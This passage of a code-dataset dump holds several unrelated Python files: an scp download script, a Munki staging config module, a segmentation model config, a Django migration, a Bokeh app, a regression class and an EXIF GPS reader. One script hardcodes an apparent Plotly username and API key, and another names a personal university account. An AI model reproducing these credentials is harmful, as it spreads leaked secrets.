utility import *\n#scp -r xiaoqian@cnic22.stanford.edu:/home/xiaoqian/Documents/nimsfs/raw/nolanw/hypno/$filename\n#/Users/xiaoqian/Projects/hypno/raw\nimport os\n\nremotehost = 'xiaoqian@cnic22.stanford.edu'\nremotedir = '/home/xiaoqian/Documents/nimsfs/raw/nolanw/hypno'\nlocaldir = '/Users/xiaoqian/Projects/hypno/raw'\n\nfor i in dict_subID:\n print (dict_subID[i])\n filename = i\n os.system('scp -r \"%s:%s/%s\" \"%s\"' % (remotehost, remotedir, filename, localdir))\n #filename1 = os.path.join(remotedir, i, '*'+'_mux3_scan')\n #filename2 = os.path.join(remotedir, i, '*'+'_sag')\n #os.system('scp -r \"%s:%s\" \"%s/%s/\"' % (remotehost, filename1, localdir, i))\n #os.system('scp -r \"%s:%s\" \"%s/%s/\"' % (remotehost, filename2, localdir, i))\n \n","sub_path":"Preprocess.py","file_name":"Preprocess.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"338964144","text":"from __future__ import print_function\n#\n# This software is Copyright (c) 2015 University of Oxford\n# \n# This work is made avaiable to you under the terms of the Apache\n# License, Version 2.0; you may not use this source code except in\n# compliance with the License. You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied. See the License for the specific language governing\n# permissions and limitations under the License.\n#\n\nfrom future import standard_library\nstandard_library.install_aliases()\nfrom builtins import object\nimport re\n\nfrom configparser import RawConfigParser, _default_dict\n\nfrom . import default_settings\n\nimport argparse\n\nfrom datetime import datetime\n\nhave_dateutil=0\ntry:\n from dateutil import parser\n have_dateutil=1\nexcept ImportError:\n pass\n\ndef _list_cmp(a,b):\n if a[0] < b[0]:\n return -1\n\n if a[0] > b[0]:\n return 1\n\n if a[0] == b[0]: # We could be more precise here,\n # and sort on [1], but it is not necessary\n return 0 \n\nclass MunkiSchedule(object):\n\n # We assume that schedule_list is the result of\n # RawConfigParser.items(section) i.e. a list of key,value tuples\n\n def __init__(self, schedule_list):\n \n self.periods = {}\n\n for day,periods in schedule_list:\n\n # NOTE: Monday == 0, Sunday == 6\n # (according to parser)\n dow=parser.parse('%s' % day).weekday()\n allowed = []\n for period in periods.split(','):\n start,end = period.split('-')\n\n s=parser.parse('%s' % start)\n e=parser.parse('%s' % end)\n\n period_start = s.hour * 3600 + s.minute * 60\n period_end = e.hour * 3600 + e.minute * 60\n if period_end < period_start:\n raise ValueError('End of period must be later than start of period - are you using the 24 hour clock ? 
(start: %s, end %s)' % (period_start, period_end) )\n if period_end == period_start:\n raise ValueError('End of period must be different to start of period (start: %s, end %s)' % (period_start , period_end) )\n \n allowed.append( [ period_start, period_end ] )\n\n self.periods[ dow ] = allowed\n\n def stage_now(self, now=None, debug=False):\n if now is None:\n now = datetime.now()\n dow = now.weekday()\n\n if dow in self.periods:\n now_int = now.hour * 3600 + now.minute * 60 + now.second\n for period in self.periods[dow]:\n if debug:\n print('%s %s %s %s' % (period[0], now_int, period[1], now))\n if period[0] <= now_int and now_int <= period[1]:\n return True\n if now_int < period[0]: # stop working when we can\n break \n\n return False\n \nclass MunkiStagingConfig(RawConfigParser):\n\n # Note: set allow_no_value=True here as the default\n # (which is what we want, but not he RawConfigParser default)\n def __init__(self, defaults=None, dict_type=_default_dict,\n allow_no_value=True):\n\n RawConfigParser.__init__(self,defaults, dict_type, allow_no_value)\n self.read_config_files = -1\n self.repositories = {}\n\n def configured_munki_repositories(self):\n\n # If we have read a config file, then use it and \n # don't allow any other overrides in for the catalogs\n if self.read_config_files >= 1:\n return MunkiStagingRepositories(self)\n\n # Otherwise, we only have a single catalog:\n repo_path = self._get_option('main', 'repo_path',\n default_value=default_settings.repo_path)\n\n return [ { 'repo_name': 'production', 'repo_path': repo_path } ]\n\n def add_munki_repo(self, repo):\n self.repositories[repo.name] = repo\n\n def munki_catalogs(self):\n # If we have read a config file, and it has sections\n # defined, use it in preferece to the defaults\n \n configcatalogs = MunkiStagingConfigCatalogs(self)\n if self.read_config_files >= 1 and len(configcatalogs) > 0 :\n return MunkiStagingConfigCatalogs(self)\n \n print(\"No configuration file ... 
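# A hypothetical usage sketch for the MunkiSchedule class above (it assumes
# python-dateutil is installed, since the constructor parses day names and
# HH:MM times with dateutil.parser). The (day, periods) tuples mirror what
# RawConfigParser.items() would return for a [schedule] section:
from datetime import datetime

schedule = MunkiSchedule([
    ('monday', '09:00-12:00,13:00-17:00'),
    ('friday', '09:00-12:00'),
])
# 2015-06-01 was a Monday; 10:30 falls inside the first window -> True
print(schedule.stage_now(now=datetime(2015, 6, 1, 10, 30)))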
using defaults\")\n # Find the first repo: if we have got this far, we assume that\n # there is only 1 repository ...\n munki_repositories = self.configured_munki_repositories()\n # munki_repositories can be an iterator or a list\n try:\n munki_repo = next(munki_repositories)\n except AttributeError:\n munki_repo = munki_repositories[0]\n \n \n # If we haven't then use the CLI options (or the defaults)\n dev_config = {}\n test_config = {}\n prod_config = {}\n\n dev_config['section_name'] = 'development'\n dev_config['list'] = self.cli_args.dev_list\n dev_config['to_list'] = self.cli_args.to_dev_list\n dev_config['catalog'] = self.cli_args.dev_catalog\n dev_config['munki_repo'] = munki_repo['repo_name']\n if self.cli_args.dev_stage_days is not None:\n dev_config['stage_days'] = self.cli_args.dev_stage_days\n\n test_config['section_name'] = 'testing'\n test_config['list'] = self.cli_args.test_list\n test_config['to_list'] = self.cli_args.to_test_list\n test_config['catalog'] = self.cli_args.test_catalog\n test_config['munki_repo'] = munki_repo['repo_name']\n if self.cli_args.test_stage_days is not None:\n test_config['stage_days'] = self.cli_args.test_stage_days\n test_config['autostage'] = self.cli_args.stage_test\n\n prod_config['section_name'] = 'production'\n prod_config['list'] = self.cli_args.prod_list\n prod_config['to_list'] = self.cli_args.to_prod_list\n prod_config['catalog'] = self.cli_args.prod_catalog\n prod_config['autostage'] = self.cli_args.stage_prod\n prod_config['munki_repo'] = munki_repo['repo_name']\n\n if self.cli_args.suffix:\n prod_config['list'] = self.cli_args.suffix\n prod_config['dated_lists'] = 1\n\n return [ dev_config, test_config, prod_config ]\n\n def get_makecatalogs(self):\n makecatalogs = self._get_option('main', 'makecatalogs',\n default_value=default_settings.makecatalogs)\n\n return makecatalogs\n\n def cli_parse(self):\n\n self.opts = argparse.ArgumentParser(description='Stage packages in Munki based on a trello board')\n\n # showconfig is a true/false thing:\n self.opts.add_argument('--showconfig', dest='showconfig',\n action='store_true',\n help='Display configuration and stop are parseing of arguments and contacting trello')\n\n for tuple in default_settings.cli_options:\n arg = tuple[0]\n help = tuple[1]\n defvalue = tuple[2]\n self.opts.add_argument(arg, help=help, default=defvalue)\n\n self.cli_args = self.opts.parse_args()\n\n def read_config(self, configfiles=None):\n cfgfiles = default_settings.config_file_locations\n if self.cli_args.config: \n cfgfiles.append(self.cli_args.config)\n\n # This allows us to override the config file settings for\n # things like testing; it should not normally be used\n if configfiles is not None:\n self.read_config_files = self.read(configfiles)\n return\n \n read_cfg_files = self.read(cfgfiles)\n self.read_config_files = len(read_cfg_files)\n\n # Strips quotes form the begining and end of option values\n # mainly to ensure that these are not present on the key, token\n # and boardids\n def _get_unquoted_option(self, section, key):\n value = self._get_option(section, key)\n value = re.sub('^(\\'|\")', '', value)\n value = re.sub('(\\'|\")$', '', value)\n return value\n\n def get_show_config(self):\n # As this is cannot be set in the config file \n # (which might be a bug):\n rv = False\n if self.cli_args.__contains__('showconfig'):\n rv = self.cli_args.__getattribute__('showconfig')\n\n return rv\n\n def get_app_key(self):\n return self._get_unquoted_option('main', 'key')\n\n def get_app_token(self):\n return 
self._get_unquoted_option('main', 'token')\n\n def get_boardid(self):\n return self._get_unquoted_option('main', 'boardid')\n\n def get_date_format(self):\n return self._get_option('main', 'date_format')\n\n def _get_option(self, section, option_name,\n cli_name=None, default_value=None):\n\n rv = default_value\n\n if self.has_option(section, option_name):\n rv = self.get(section, option_name)\n \n if cli_name is None:\n cli_name = option_name\n\n # Only look at cmd line if no config file\n if self.read_config_files <= 0 and self.cli_args.__contains__(cli_name):\n cli = self.cli_args.__getattribute__(cli_name)\n if cli is not None:\n rv = cli\n\n return rv\n \n def get_rssdirectory(self):\n return self._get_option('rssfeeds', 'rssdir')\n\n def get_rss_link_template(self):\n return self._get_option('rssfeeds', 'rss_link_template')\n\n def get_rss_icon_url_template(self):\n return self._get_option('rssfeeds', 'icon_url_template')\n\n def get_catalog_link_template(self):\n return self._get_option('rssfeeds', 'catalog_link_template')\n\n def get_guid_link_template(self):\n return self._get_option('rssfeeds', 'guid_link_template')\n\n def get_description_template(self):\n return self._get_option('rssfeeds', 'get_description_template',\n default_value = 'Software packages in %s catalog')\n\n def autostage_schedule(self, catalog=None):\n if have_dateutil == 0:\n print('python module dateutil is not installed')\n print('it is not possible to control scheduling')\n return None\n\n if catalog is None:\n if self.has_section('schedule'):\n return MunkiSchedule( self.items('schedule') )\n elif self.has_section('schedule_%s' % catalog ):\n return MunkiSchedule( self.items('schedule_%s' % catalog ) )\n\n return None\n\n def print_expected_trello(self):\n print()\n print('The current configuration expects a Trello board with the')\n print('following lists: ')\n print()\n for munki_cat in self.munki_catalogs():\n catname = munki_cat['catalog']\n\n list = munki_cat['list']\n to_list = munki_cat['to_list']\n \n print('\\tFor Munki catalog %s' % catname)\n print('\\t\\tTo list : %s' % to_list)\n print('\\t\\tPackage list: %s' % list)\n \n\nclass MunkiStagingConfigCatalogs(object):\n\n catalog_re = re.compile('munki_catalog_(\\w+)')\n\n def __init__(self, munki_staging_config):\n self.config = munki_staging_config\n self.len = None\n self.sections = munki_staging_config.sections()\n \n def __iter__(self):\n return self\n \n def __next__(self):\n while len(self.sections) > 0:\n section = self.sections.pop()\n rv = self.catalog_re.match(section)\n if rv:\n section_config = {}\n name = rv.group(1)\n section_config['section_name'] = name\n for opt in self.config.options(section):\n section_config[opt] = self.config.get(section, opt)\n\n return section_config\n\n raise StopIteration() \n\n\n def __len__(self):\n if self.len is None:\n self.len = 0\n for section in self.config.sections():\n if self.catalog_re.match(section):\n self.len = self.len + 1\n\n return self.len\n \n# Um ... 
this is basically the same as the above; do we need it ?\nclass MunkiStagingRepositories(object):\n\n mrepo_re = re.compile('munki_repo_(\\w+)')\n\n def __init__(self, munki_staging_config):\n self.config = munki_staging_config\n self.sections = munki_staging_config.sections()\n \n def __iter__(self):\n return self\n \n def __next__(self):\n while len(self.sections) > 0:\n section = self.sections.pop()\n rv = self.mrepo_re.match(section)\n if rv:\n repo_config = {}\n name = rv.group(1)\n repo_config['repo_name'] = name\n for opt in self.config.options(section):\n repo_config[opt] = self.config.get(section, opt)\n\n return repo_config\n\n raise StopIteration() \n\n","sub_path":"munkistaging/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":13102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"369718638","text":"# model settings\nnorm_cfg = dict(type='BN', requires_grad=True)\nmodel = dict(\n type='SigmoidEncoderDecoder',\n score_thr=0.5,\n mode='noco',\n pretrained='open-mmlab://resnet50_v1c',\n backbone=dict(\n type='FlexResNet',\n depths=(3, 4, 6, 3),\n block='bottleneck',\n stem_channels=64,\n base_channels=64,\n stem_stride=2,\n max_pooling=True,\n in_channels=1,\n deep_stem=True,\n out_indices=(0, 1, 2, 3),\n dilations=(1, 1, 2, 4),\n strides=(1, 2, 1, 1),\n norm_cfg=norm_cfg,\n norm_eval=False,\n style='pytorch',\n contract_dilation=True,\n ),\n neck=dict(\n type='FlexFTP',\n ###### PVTv2 parameters ######\n # sr_ratios=[4, 2, 1, 1], # R_i\n sr_ratios=[1, 1, 1, 1], # R_i\n num_heads=4,\n mlp_ratio=0.5,\n # mlp_ratio=1,\n trans_lateral=False,\n ###### FlexFPN parameters ######\n out_inds=0,\n in_channels=[256, 512, 1024, 2048],\n out_channels=64,\n num_outs=4),\n decode_head=dict(\n type='FCNHead',\n in_channels=64,\n in_index=0,\n channels=32,\n num_convs=2,\n concat_input=True,\n dropout_ratio=0.1,\n num_classes=1,\n norm_cfg=norm_cfg,\n align_corners=False,\n loss_decode=dict(\n type='SoftIoULoss', loss_weight=1.0)),\n # model training and testing settings\n train_cfg=dict(),\n test_cfg=dict(mode='whole'))\n","sub_path":"configs/_base_/models/flex_ftp_r50-d8.py","file_name":"flex_ftp_r50-d8.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"449195087","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\ndef process_grade(apps, schema_editor):\n CampusAmbassadorApplication = apps.get_model(\"ambassador\", \"CampusAmbassadorApplication\")\n for row in CampusAmbassadorApplication.objects.all():\n if row.grade not in [\"HSFR\", \"HSSO\", \"HSJR\", \"HSSR\", \"COFR\", \"COSO\"]:\n row.grade_other = row.grade\n row.grade = \"OTHR\"\n row.save()\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('ambassador', '0006_auto_20170321_0731'),\n ]\n\n operations = [\n migrations.RunPython(process_grade, reverse_code=migrations.RunPython.noop),\n ]\n","sub_path":"django/ambassador/migrations/0007_auto_20170321_0733.py","file_name":"0007_auto_20170321_0733.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"322143357","text":"import pandas as pd\nimport csv\nimport gc\n\nchunksize = 10 ** 5\ni = 0\nfor chunk_df in pd.read_csv('/hugedisk/apanchenko/sales_w2.csv', chunksize=chunksize, header=None):\n chunk_df.columns = ['plant', 'material', 'cat_id', 
'subcat_id', 'group_id', 'calday',\n 'matrix_type', 'target', 'is_action', 'regular_price', 'action_price']\n for index, row in chunk_df.iterrows():\n csv_file = open('/hugedisk/apanchenko/plantmaterial/plant%dmaterial%d.csv' % (row[0], row[1]), 'a')\n writer = csv.writer(csv_file)\n writer.writerow(row)\n csv_file.close()\n \n del chunk_df\n gc.collect()\n \n i += 1\n print('%d%% DONE. The #%d chunk of 4817 was processed! To be continued... ' % (i / 4817 * 100, i))\n","sub_path":"csv_split.py","file_name":"csv_split.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"190413549","text":"import sys\nfrom os.path import dirname\nfrom os.path import join, abspath\n\nimport numpy as np\nimport pandas as pd\nfrom bokeh.core.properties import value\nfrom bokeh.io import curdoc\nfrom bokeh.layouts import column, row\nfrom bokeh.models import ColumnDataSource, CustomJS\nfrom bokeh.models.widgets import Slider, Button, DataTable, TableColumn, \\\n NumberFormatter, Div\nfrom bokeh.plotting import figure\nfrom bokeh.transform import dodge\n\nsys.path.append(dirname(__file__))\nfrom knapsack import Knapsack\n\n# Constants -------------------------------------------------------------------\ncols = ['Keyword', 'daily_impressions_average', 'daily_clicks_average',\n 'ad_position_average', 'cpc_average', 'daily_cost_average', 'source']\nmetric = cols[1:-1]\n\n# Path to files\npath = abspath(join(dirname(__file__), 'tmp'))\n# read output of scraping and stats\nfull = pd.read_csv(join(path, \"jshleap_stats.csv\"), usecols=cols)\ndf = full.dropna()\nnan_idx = df.index\nnan_df = full[~full.index.isin(nan_idx)]\nminimum = min(df.daily_cost_average[df.daily_cost_average > 0])\nfirst_budget = max(minimum, 0.1)\nmaximum = min(400, max(df.daily_cost_average))\nchoice = ['GKP', 'Optimized']\n\n\n# Functions ###################################################################\ndef optimize_values(data_frame, capacity, label):\n data_frame = data_frame.drop_duplicates(subset='Keyword')\n cost = data_frame.daily_cost_average.copy(deep=True)\n cost[cost == 0] = minimum / 10\n values = (data_frame.daily_impressions_average +\n data_frame.daily_clicks_average) * (1 / cost)\n opt = Knapsack(items_names=data_frame.Keyword.to_list(),\n values=values.to_list(), capacity=capacity,\n weights=data_frame.daily_cost_average.tolist(),\n solve_type=5, name='Branch_n_bound_%s' % label)\n opt.get_results(print_it=True)\n df = data_frame[data_frame.Keyword.isin(opt.packed_items)]\n return df\n\n\ndef set_table_source(dataframe):\n data = {'Keyword': dataframe.Keyword,\n 'daily_impressions_average': dataframe.daily_impressions_average,\n 'daily_clicks_average': dataframe.daily_clicks_average,\n 'ad_position_average': dataframe.ad_position_average,\n 'cpc_average': dataframe.cpc_average,\n 'daily_cost_average': dataframe.daily_cost_average,\n 'source': dataframe.source}\n source = ColumnDataSource(data=data)\n return data, source\n\n\n# Body of app #################################################################\ndata, source = set_table_source(df)\ndata_missing, source_missing = set_table_source(nan_df)\ncurrent = optimize_values(df, first_budget, 'current')\ngkp = optimize_values(df[df.source == 'GKP'], first_budget, 'gkp')\nrelabel = ['Daily impressions', 'Daily Clicks', 'Ad Position', 'CPC',\n 'Daily Cost']\nbar_data = {'metric': relabel,\n choice[0]: np.log([gkp[x].sum() for x in metric]),\n choice[1]: np.log([current[x].sum() for x in 
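# An alternative sketch for the per-row writes in csv_split.py above: group
# each chunk by (plant, material) and append one group at a time, so each
# chunk opens one file per group instead of one per row. Column names and the
# output directory are taken from the original script; nothing else is assumed.
import pandas as pd

def write_chunk_by_group(chunk_df, out_dir='/hugedisk/apanchenko/plantmaterial'):
    for (plant, material), group in chunk_df.groupby(['plant', 'material']):
        path = '%s/plant%dmaterial%d.csv' % (out_dir, plant, material)
        group.to_csv(path, mode='a', header=False, index=False)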
metric])}\n\nbar_source = ColumnDataSource(data=bar_data)\n\np = figure(x_range=relabel, y_range=(-5, 15), plot_height=325,\n toolbar_location=None, tools=\"\",\n title='Relative Value change for baskets of words')\np.vbar(x=dodge('metric', -0.25, range=p.x_range), top=choice[0], width=0.2,\n source=bar_source, color=\"#c9d9d3\", legend=value(choice[0]))\np.vbar(x=dodge('metric', 0.25, range=p.x_range), top=choice[1], width=0.2,\n source=bar_source, color=\"#e84d60\", legend=value(choice[1]))\np.x_range.range_padding = 0.1\np.xgrid.grid_line_color = None\np.legend.location = \"top_left\"\np.legend.orientation = \"horizontal\"\np.yaxis.axis_label_text_font_size = '18pt'\np.xaxis.axis_label_text_font_size = '18pt'\n\n\ndef update():\n print('Slider Value', slider.value)\n current = optimize_values(df, slider.value, 'current')\n gkp = optimize_values(df[df.source == 'GKP'], slider.value, 'gkp')\n impressions = current.daily_impressions_average\n source.data = {'Keyword': current.Keyword,\n 'daily_impressions_average': impressions,\n 'daily_clicks_average': current.daily_clicks_average,\n 'ad_position_average': current.ad_position_average,\n 'cpc_average': current.cpc_average,\n 'daily_cost_average': current.daily_cost_average,\n 'source': current.source\n }\n bar_data[choice[0]] = np.log([gkp[x].sum() for x in metric])\n bar_data[choice[1]] = np.log([current[x].sum() for x in metric])\n bar_source.data = bar_data\n\n\nslider = Slider(title=\"Daily budget\", start=minimum, end=maximum,\n value=first_budget, step=0.1, format=\"0,0\")\nslider.on_change('value', lambda attr, old, new: update())\n\nbutton = Button(label=\"Download\", button_type=\"success\", width=400)\nbutton.callback = CustomJS(args=dict(source=source),\n code=open(join(dirname(__file__), \"download.js\")\n ).read())\n\ncolumns = [\n TableColumn(field=\"Keyword\", title=\"Keyword\"),\n TableColumn(field=\"daily_cost_average\", title=\"Cost\",\n formatter=NumberFormatter(format=\"$0,0.00\")),\n TableColumn(field=\"ad_position_average\", title=\"Position\"),\n TableColumn(field=\"daily_clicks_average\", title=\"Clicks\"),\n TableColumn(field=\"cpc_average\", title=\"CPC\"),\n TableColumn(field=\"daily_impressions_average\", title='Impressions'),\n TableColumn(field=\"source\", title='Source')\n]\n\ndiv = Div(text=\"\"\"Optimized keywords\"\"\", width=400, height=20)\ndiv_missing = Div(text=\"\"\"Keywords without data\"\"\", width=400, height=20\n )\ndata_table = DataTable(source=source, columns=columns, width=450, height=200)\n\ndata_table_nans = DataTable(source=source_missing, columns=columns,\n width=450, height=200)\n\nlayout = row(column(div, data_table, button, sizing_mode=\"scale_width\"),\n column(p, sizing_mode=\"scale_width\"))\ncurdoc().add_root(slider)\ncurdoc().add_root(layout)\ncurdoc().add_root(row(column(div_missing, data_table_nans,\n sizing_mode=\"scale_width\"),\n sizing_mode=\"scale_width\"))\ncurdoc().title = \"Export CSV\"\n\nupdate()\n","sub_path":"ADvantage_web_example/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"283704104","text":"from matrixOp import transpose, multiply, inverse\r\nfrom utils import myMatrix\r\n\r\n\r\nclass MyLinearMultivariateRegression:\r\n\r\n def __init__(self):\r\n self.__intercept = 0.0\r\n self.__coefs = []\r\n\r\n @property\r\n def intercept(self):\r\n return self.__intercept\r\n\r\n @property\r\n def coefs(self):\r\n return self.__coefs\r\n\r\n def 
fit(self, inputs, outputs):\r\n\r\n for i in range(len(inputs)):\r\n inputs[i].insert(0, 1)\r\n\r\n X = inputs\r\n Y = myMatrix(outputs)\r\n\r\n XT = transpose(X)\r\n p = multiply(XT, X)\r\n p1 = inverse(p)\r\n p2 = multiply(p1, XT)\r\n w = multiply(p2, Y)\r\n\r\n self.__intercept = w[0][0]\r\n self.__coefs = [w[i][0] for i in range(1, len(w))]\r\n\r\n def predict(self, inputs):\r\n outputs = []\r\n for input in inputs:\r\n prediction = self.__intercept\r\n for pos in range(len(self.__coefs)):\r\n prediction += input[pos] * self.__coefs[pos]\r\n outputs.append(prediction)\r\n return outputs\r\n\r\n def predictionError(self, predictedOutputs, realOutputs):\r\n error = 0.0\r\n for o1, o2 in zip(predictedOutputs, realOutputs):\r\n error += (o1 - o2) ** 2\r\n\r\n return error / len(realOutputs)\r\n","sub_path":"LeastSquaresMethod/MyLinearMultivariateRegression.py","file_name":"MyLinearMultivariateRegression.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"554700367","text":"# Modified version of exifdump.py, written by Thierry Bousch \n# Public Domain\n\n# Exif information decoder\nimport os\nimport arcpy\nimport arcpy.da as da\n\ndef CreateBadPhotosTable(badphotostable, longestpath):\n arcpy.CreateTable_management(os.path.dirname(badphotostable), os.path.basename(badphotostable))\n # Add single Photo field to store the path of the photo that is missing GPS coordinates\n arcpy.AddField_management(badphotostable, \"Photo\", \"TEXT\", \"\", \"\", longestpath)\n # If table is dbf or arcinfo table, an unnecessary field \"Field1\" will have been added. Delete it\n delfields = [field.name for field in arcpy.ListFields(badphotostable) if not field.required and field.name != \"Photo\"]\n if delfields:\n arcpy.DeleteField_management(badphotostable, delfields)\n\ndef ListPhotos(folder):\n # Iterate recursively, finding photo files and passing them to the GenXYZ function\n list = []\n for (dirpath, dirnames, filenames) in os.walk(folder):\n for file in (f for f in filenames if os.path.splitext(f)[1].lower() in ('.tiff', '.tif', '.jpg', '.jpeg')):\n list.append(os.path.join(dirpath, file))\n list.sort()\n return list\n\ndef GetExifMetadata(file):\n \"\"\"Function that reads Exif metadata properties from a photo file and returns an object with properties: file (path), x (lon), y (lat), z (alt), and m (DateTime)\"\"\"\n\n class PhotoExifObj():\n \"\"\"Object that contains Exif metadata properties extracted from a photo file: file (path), x (lon), y (lat), z (alt), and m (DateTime)\"\"\"\n file = x = y = z = None\n d = -9999\n m = \"\"\n\n photo = PhotoExifObj()\n photo.file = file\n\n pic = open(file, \"rb\")\n #two cases: tif and jpg\n data = pic.read(4)\n while True:\n try:\n if data[0:4] == \"II*\\x00\" or data[0:4] == \"MM*\\x00\":\n pic.seek(0)\n data = pic.read()\n else:\n pic.seek(0)\n if pic.read(2) != str(\"\\xff\\xd8\"):\n break\n marker = pic.read(2)\n if marker == str(\"\\xff\\xe0\"):\n length = ord(pic.read(1)) * 256 + ord(pic.read(1))\n pic.read(length - 2)\n marker = pic.read(2)\n if ord(marker[0]) == 255:\n if ord(marker[1]) < 224 or ord(marker[1]) >239:\n break\n else:\n break\n header = pic.read(8)\n if header[2:6] != \"Exif\" or header[6:8] != \"\\x00\\x00\":\n pic.seek(0)\n exifHeaderLoc = pic.read().find(\"Exif\")\n if exifHeaderLoc > -1:\n pic.seek(0)\n header = pic.read()[exifHeaderLoc-2:exifHeaderLoc+6]\n pic.seek(0)\n pic.read(exifHeaderLoc+6)\n else:\n break\n length = 
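# A numpy cross-check of the normal-equation solution w = (X^T X)^(-1) X^T y
# that fit() above computes with the local matrixOp helpers (numpy is an
# assumption here, used only for this illustration):
import numpy as np

X = np.array([[1.0, 2.0, 3.0], [1.0, 4.0, 1.0], [1.0, 0.0, 2.0]])  # bias column first
y = np.array([14.0, 11.0, 7.0])
w = np.linalg.inv(X.T @ X) @ X.T @ y
# For a square, full-rank X the normal equations reproduce an exact fit:
assert np.allclose(X @ w, y)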
ord(header[0]) * 256 + ord(header[1])\n data = pic.read(length-8)\n\n T = TIFF_file(data)\n L = T.list_IFDs()\n for i in range(len(L)):\n IFD = T.dump_IFD(L[i])\n exif_off = gps_off = 0\n for tag,type,values in IFD:\n if tag == 0x8769:\n exif_off = values[0]\n if tag == 0x8825:\n gps_off = values[0]\n if exif_off:\n dict = {}\n IFD = T.dump_IFD(exif_off)\n for tag in IFD:\n dict[tag[0]] = tag[2]\n if tag[0] == 0x9003:\n datetime = dict[0x9003]\n photo.m = datetime\n if gps_off:\n IFD = T.dump_IFD(gps_off)\n gpsdict = {}\n for each in IFD:\n gpsdict[each[0]] = each[2]\n lat = (float(gpsdict[2][0].num) / gpsdict[2][0].den) + \\\n ((float(gpsdict[2][1].num) / gpsdict[2][1].den) * (float(1) / 60)) + \\\n ((float(gpsdict[2][2].num) / gpsdict[2][2].den) * (float(1) / 3600))\n lat = -lat if gpsdict[1]== \"S\" else lat\n lon = (float(gpsdict[4][0].num) / gpsdict[4][0].den) + \\\n ((float(gpsdict[4][1].num) / gpsdict[4][1].den) * (float(1) / 60)) + \\\n ((float(gpsdict[4][2].num) / gpsdict[4][2].den) * (float(1) / 3600))\n lon = -lon if gpsdict[3] == \"W\" else lon\n try:\n alt = float(gpsdict[6][0].num) / gpsdict[6][0].den\n except:\n alt = None\n try:\n direction = list(gpsdict[17])[0].num/float(list(gpsdict[17])[0].den)\n except:\n direction = -9999\n photo.x = lon\n photo.y = lat\n photo.z = alt\n photo.d = direction\n if photo.x and photo.y and photo.z and photo.m and photo.d:\n break\n except:\n break\n finally:\n break\n return photo\n\ndef s2n_motorola(str):\n x = 0\n for c in str:\n x = (x << 8) | ord(c)\n return x\n\ndef s2n_intel(str):\n x = 0\n y = 0\n for c in str:\n x = x | (ord(c) << y)\n y = y + 8\n return x\n\nclass Fraction:\n\n def __init__(self, num, den):\n self.num = num\n self.den = den\n\n def __repr__(self):\n # String representation\n return '%d/%d' % (self.num, self.den)\n\n\nclass TIFF_file:\n\n def __init__(self, data):\n self.data = data\n self.endian = data[0]\n\n def s2n(self, offset, length, signed=0):\n slice = self.data[offset:offset+length]\n if self.endian == 'I':\n val = s2n_intel(slice)\n else:\n val = s2n_motorola(slice)\n # Sign extension ?\n if signed:\n msb = 1 << (8*length - 1)\n if val & msb:\n val = val - (msb << 1)\n return val\n\n def first_IFD(self):\n return self.s2n(4, 4)\n\n def next_IFD(self, ifd):\n entries = self.s2n(ifd, 2)\n return self.s2n(ifd + 2 + 12 * entries, 4)\n\n def list_IFDs(self):\n i = self.first_IFD()\n a = []\n while i:\n a.append(i)\n i = self.next_IFD(i)\n return a\n\n def dump_IFD(self, ifd):\n entries = self.s2n(ifd, 2)\n a = []\n for i in range(entries):\n entry = ifd + 2 + 12*i\n tag = self.s2n(entry, 2)\n type = self.s2n(entry+2, 2)\n if not 1 <= type <= 10:\n continue # not handled\n typelen = [ 1, 1, 2, 4, 8, 1, 1, 2, 4, 8 ] [type-1]\n count = self.s2n(entry+4, 4)\n #if count == 1:\n # count = 2\n offset = entry+8\n if count*typelen > 4:\n offset = self.s2n(offset, 4)\n if type == 2:\n # Special case: nul-terminated ASCII string\n values = self.data[offset:offset+count].split('\\x00', 1)[0]\n else:\n values = []\n signed = (type == 6 or type >= 8)\n for j in range(count):\n if type % 5:\n # Not a fraction\n value_j = self.s2n(offset, typelen, signed)\n else:\n # The type is either 5 or 10\n value_j = Fraction(self.s2n(offset, 4, signed),\n self.s2n(offset+4, 4, signed))\n values.append(value_j)\n offset = offset + typelen\n # Now \"values\" is either a string or an array\n a.append((tag,type,values))\n return a","sub_path":"Simple Map 
viewer/bin/Debug/ArcGISRuntime10.2.7/LocalServer64/ArcToolbox/Scripts/ExifUtils.py","file_name":"ExifUtils.py","file_ext":"py","file_size_in_byte":7987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"511013992","text":"import statistics\nimport PIL\nimport plotly\nimport plotly \nplotly.tools.set_credentials_file(username='ib.m.jorgensen', \n api_key='l9HRRRx9SozelyejpQ9V')\nimport math\n\nif __name__ == '__main__':\n seq = [0]\n \n for i in range(1,100):\n seq.append(statistics.mean(seq[:i]) + 1)\n\n prev = 0\n cur = 0\n cure = 0\n for i,v in enumerate(seq):\n if i >= 2:\n prev = math.exp(seq[i-1])\n cure = math.exp(seq[i])\n cur = seq[i]\n print(\"{: >4d}: {:.3f} {:.3f} {:.10f} {:.4f}\".format(\n i,cur,cure, cure - prev, math.log(i+1)+math.log(1.7810)))\n\n\n \n","sub_path":"170113riddle.py","file_name":"170113riddle.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"35946000","text":"import 